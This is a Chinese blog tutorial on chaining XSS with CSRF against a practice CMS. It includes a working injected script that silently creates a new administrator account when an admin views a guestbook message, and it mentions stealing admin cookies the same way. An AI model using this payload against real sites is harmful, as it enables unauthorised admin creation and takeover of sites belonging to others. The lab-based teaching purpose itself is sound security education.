XSS+CSRF组合拳

2024-06-20 16:12
文章标签 xss csrf 组合拳

本文主要是介绍XSS+CSRF组合拳,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

简介

如何进行实战

进入后台创建一个新用户进行接口分析

构造注入代码

寻找XSS漏洞并注入

小结


简介

(案例中将使用cms靶场来进行演示)

在实战中CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情 。所以单单一个CSRF漏洞危害是很小的,所以我们为了扩大危害,就需要借助XSS漏洞与之配合 。我们利用XSS漏洞让受害者执行JS代码,JS代码有发起请求的功能,借此功能我们配合CSRF漏洞达成我们的攻击。我们利用XSS执行JS代码的时候发起我们构造的恶意请求,从而能达到让受害者无感知地受到攻击。

如何通过js发起请求,具体来说有以下步骤

  1. 创建 XMLHttpRequest 实例

  2. 发出 HTTP 请求

  3. 接收服务器传回的数据

  4. 更新网页数据

如何进行实战

  1. 分析功能点的请求接口,构造恶意请求(创建网站后台管理员账密)

  2. 编写发起恶意请求的恶意JS

  3. 寻找XSS漏洞

  4. 使用恶意的JS进行XSS攻击 

进入后台创建一个新用户进行接口分析

构造注入代码

根据刚刚抓到的包构造创建一个新管理员的代码

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","添加管理员的页面",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=test&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

寻找XSS漏洞并注入

载我安装的cms中发现有留言板尝试注入,将刚刚编写好的注入代码插入到输入框,留言页面的输入框都可以尝试注入

留言成功

 现在我们到后台模拟管理员审核

(现在是没有管理员的)

 管理员查看留言

现在再看管理员界面发现多了一个管理员正是我们模拟创建的管理员

小结

你的xss漏洞打到网站后台,并不一定要添加管理员,你也可以抓取管理员的cookie。本次攻击的最大工臣还是xss漏洞,没有xss漏洞这次攻击是无从谈起的。

这个漏洞在如今已经已经几乎不存在了,因为csrf很好防御。


不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚

这篇关于XSS+CSRF组合拳的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1078621

相关文章

vue+el国际化-东抄西鉴组合拳

vue-i18n 国际化参考 https://blog.csdn.net/zuorishu/article/details/81708585 说得比较详细。 另外做点补充,比如这里cn下的可以以项目模块加公共模块来细分。 import zhLocale from 'element-ui/lib/locale/lang/zh-CN' //引入element语言包const cn = {mess

DVWA-CSRF-samesite分析

拿DVWA的CSRF为例子 接DVWA的分析,发现其实Impossible的PHPSESSID是设置的samesite=1. 参数的意思参考Set-Cookie SameSite:控制 cookie 是否随跨站请求一起发送,这样可以在一定程度上防范跨站请求伪造攻击(CSRF)。 下面用DVWA CSRF Low Level来分析下samsite的设置。 DVWA CSRF Cookie一共包

XSS跨站攻击漏洞

XSS跨站攻击漏洞 一 概述 1 XSS概述 xss全称为:Cross Site Scripting,指跨站攻击脚本,XSS漏洞发生在前端,攻击的是浏览器的解析引擎,XSS就是让攻击者的JavaScript代码在受害者的浏览器上执行。 XSS攻击者的目的就是寻找具有XSS漏洞的网页,让受害者在不知情的情况下,在有XSS漏洞的网页上执行攻击者的JavaScript代码。 XSS是提前埋伏好

rails中Can't verify CSRF token authenticity错误解决办法

在rails中 以客户端去访问服务器端 经常会终端出现 Can't verify CSRF token authenticity   这是由于客户端访问服务器端   rails会需要token验证 只需要在服务端对应的Controller中加入 skip_before_filter :verify_authenticity_token,:only => : funct

网络安全:Web 安全 面试题.(CSRF)

网络安全:Web 安全 面试题.(CSRF) 网络安全面试是指在招聘过程中,面试官会针对应聘者的网络安全相关知识和技能进行评估和考察。这种面试通常包括以下几个方面: (1)基础知识:包括网络基础知识、操作系统知识、密码学知识等。 (2)安全技术:如入侵检测、防火墙配置、密码管理、漏洞分析等技术的掌握程度。 (3)安全实践:评估应聘者在实际工作中解决网络安全问题的能力,如案例分析、渗透测试等

浅谈xss原理

近日,论坛上面XSS满天飞,各处都可以见到XSS的痕迹,前段时间论坛上面也出现了XSS的迹象。然后我等小菜不是太懂啊,怎么办?没办法只有求助度娘跟谷歌这对情侣了。 可以说小菜也算懂了一些,不敢藏私,故发文出来大家一块学习,讨论。 下面是正文: 0x00:xss的来由 记得之前看过一篇文章,这样来形容XSS “ 如果把浏览器看作WEB2.0后时代的操作系统,那么客户端脚本就相当于传统

网络安全:Web 安全 面试题.(XSS)

网络安全:Web 安全 面试题.(XSS) 网络安全面试是指在招聘过程中,面试官会针对应聘者的网络安全相关知识和技能进行评估和考察。这种面试通常包括以下几个方面: (1)基础知识:包括网络基础知识、操作系统知识、密码学知识等。 (2)安全技术:如入侵检测、防火墙配置、密码管理、漏洞分析等技术的掌握程度。 (3)安全实践:评估应聘者在实际工作中解决网络安全问题的能力,如案例分析、渗透测试等。

软硬件节水“组合拳”,助力智慧灌区信息化建设!

水资源短缺已成为全球共同面临的挑战,尤其在农业灌溉领域,其影响尤为显著。农业作为水资源消耗的主要行业之一,在日益严峻的水资源形势下,构建节水型灌区的紧迫性日益凸显。 节水型灌区的建设,旨在通过优化灌溉方式、减少水资源浪费、提升灌溉水利用效率,从而确保农业生产的稳定与高效。此举不仅有助于保障粮食安全,更有助于推动农业生态环境的改善,引领农业走向更加绿色、可持续的发展道路。 智慧灌区信息化

Web渗透:XSS-反射型存储型

跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到网页中,其他用户在浏览这些页面时,可能会执行这些恶意脚本,从而导致各种安全问题,如窃取用户信息、会话劫持等。 产生原因: XSS漏洞其实就是一个前端漏洞,产生的根本原因是未对用户输入进行充分验证和过滤,导致恶意用户能够将恶意脚本注入到网页中,使其在其他用户浏览页面时执行。 接